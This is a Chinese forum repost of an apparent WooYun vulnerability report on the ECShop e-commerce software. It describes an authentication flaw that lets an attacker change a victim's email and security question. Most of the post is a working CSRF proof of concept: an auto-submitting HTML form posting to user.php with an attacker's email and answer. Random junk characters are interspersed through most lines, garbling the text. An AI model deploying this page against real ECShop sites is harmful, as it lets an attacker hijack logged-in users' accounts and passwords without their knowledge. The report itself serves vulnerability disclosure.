找回密码
 立即注册
查看: 2761|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
简要描述:
8 T, h: K8 f9 b# o8 R6 b4 Tecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
# b% s* m7 \7 w% P  s- Y6 n+ L( s8 j, E5 q
Demo For:http://www.wooyun.org/bug.php?action=view&id=395
& B( P' u  C1 x# |* u
! r. A) S3 F( @$ a0 a! {详细说明:
/ q' L) a! d" {利用csrf和xss可以突破官方所说的“障碍”
" ?( z& L+ x) y% s* `/ z7 gxss版本已经有人说明' o# `" e$ ]/ Y+ S* t9 \
这里给出csrf版本
) r& X' D$ e/ m; q8 s3 V5 S$ A( t8 k: y* _8 V# P8 V
漏洞证明:
. c& P. T  ]' y<html>
# I" }6 e' l  |4 T<body>3 ?" k! L/ E8 }" u% i2 U/ _
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">7 C  H1 ]2 L% x# Z  a7 `
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
0 k* ^7 z# L5 v$ V  [& m/ Z<INPUT TYPE="text" NAME="act" value="act_edit_profile">
( d- @: r9 r7 v9 a<INPUT TYPE="text" NAME="sel_question" value="ecshop">/ q8 t# Z3 m- n1 [" \
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
/ L  Y6 D+ I: U9 [</body>; N8 u/ H  S5 s* [
<script>0 J( _8 a0 v: [. H% a
document.forms[0].submit();6 V' B1 Z2 x9 e" F4 O2 N( q# F
</script>3 e, r/ F8 w; m, [
</html>0 |5 K, F: V2 K+ L/ R
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失9 P0 K# e' [* t) B% t
3 c1 d% e" y- Y
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表